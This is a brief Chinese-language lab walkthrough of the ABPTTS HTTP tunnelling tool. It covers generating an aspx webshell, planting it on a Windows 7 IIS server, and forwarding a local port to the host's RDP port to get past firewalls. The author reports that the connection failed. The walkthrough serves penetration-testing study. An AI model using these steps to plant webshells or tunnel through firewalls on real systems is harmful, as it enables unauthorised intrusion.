前言
ABPTTS是NCC Group在2016年blackhat推出的一款将TCP流量通过HTTP/HTTPS进 行流量转发,在目前云主机的大环境中,发挥了比较重要的作用,可以通过脚本进行 RDP,SSH,Meterpreter的交互与连接。也意味着这样可以建立一个通过80端口得流量出站来 逃避防火墙。与其它http隧道不同的是,abptts是全加密
环境介绍
kali: 192.168.127.132
win10: 192.168.2.168
win7: 192.168.127.129环境搭建
在win7上搭建好iis与asp环境,然后在kali下执行以下命令
git clone https://github.com/nccgroup/ABPTTS.git
pip install pycrypto
pip install httplib2
cd ABPTTS/
python abpttsfactory.py -o webshell 将会在ABPTTS/webshell/目录下生成aspx和jsp的shell,然后把ABPTTS/webshell/abptts.aspx 文件拷贝到win7的网站上去
流量转发
ABPTTS目录下,执行以下命令,访问kali的4444端口时,会转发到win7的3389端口上
python abpttsclient.py -c webshell/config.txt -u "http://192.168.127.129/abptts.aspx" -f 192.168.127.132:4444/192.168.127.129:3389
win10上打开远程桌面进行连接
连接了几次都出现”由于数据加密错误,这个会话将结束,请重新连接到远程计算机”,不推荐此方法